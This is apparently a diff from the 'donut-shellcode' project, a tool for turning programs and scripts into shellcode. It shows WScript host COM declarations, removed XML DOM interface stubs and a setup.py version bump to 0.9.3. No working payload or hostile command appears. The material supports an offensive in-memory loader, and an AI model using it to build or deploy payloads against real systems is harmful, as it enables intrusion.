113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+0
-588
payload/xmldom.h
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+0
-4
setup.cfg
0 [egg_info]
1 tag_build =
2 tag_date = 0
3
0 from setuptools import Extension, setup
0 from setuptools import Extension, setup, sys
11
22 with open("README.md", "r") as fh:
33 long_description = fh.read()
44
5 static_libraries = ['aplib64']
6 static_lib_dir = 'lib'
7 libraries = []
8 library_dirs = ['lib']
9 extra_compile_args = []
10 extra_link_args = []
11 extra_objects = []
12 include_dirs = ['include']
13 sources = ['donut.c',
14 'hash.c',
15 'encrypt.c',
16 'format.c',
17 'loader/clib.c',
18 'donutmodule.c']
19
20 if sys.platform == 'win32':
21 libraries.extend(static_libraries)
22 library_dirs.append(static_lib_dir)
23 extra_objects = []
24 elif sys.platform == 'win64':
25 libraries.extend(static_libraries)
26 library_dirs.append(static_lib_dir)
27 extra_objects = []
28 else: # POSIX
29 extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
30
31
532 module = Extension(
633 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
34 include_dirs = include_dirs,
35 sources = sources,
36 libraries = libraries,
37 library_dirs = library_dirs,
38 extra_compile_args = extra_compile_args,
39 extra_link_args = extra_link_args,
40 extra_objects = extra_objects,
1741 )
1842
1943 setup(
2044 name='donut-shellcode',
21 version='0.9.2',
45 version='0.9.3',
2246 description='Donut Python C extension',
2347 long_description=long_description,
2448 long_description_content_type="text/markdown",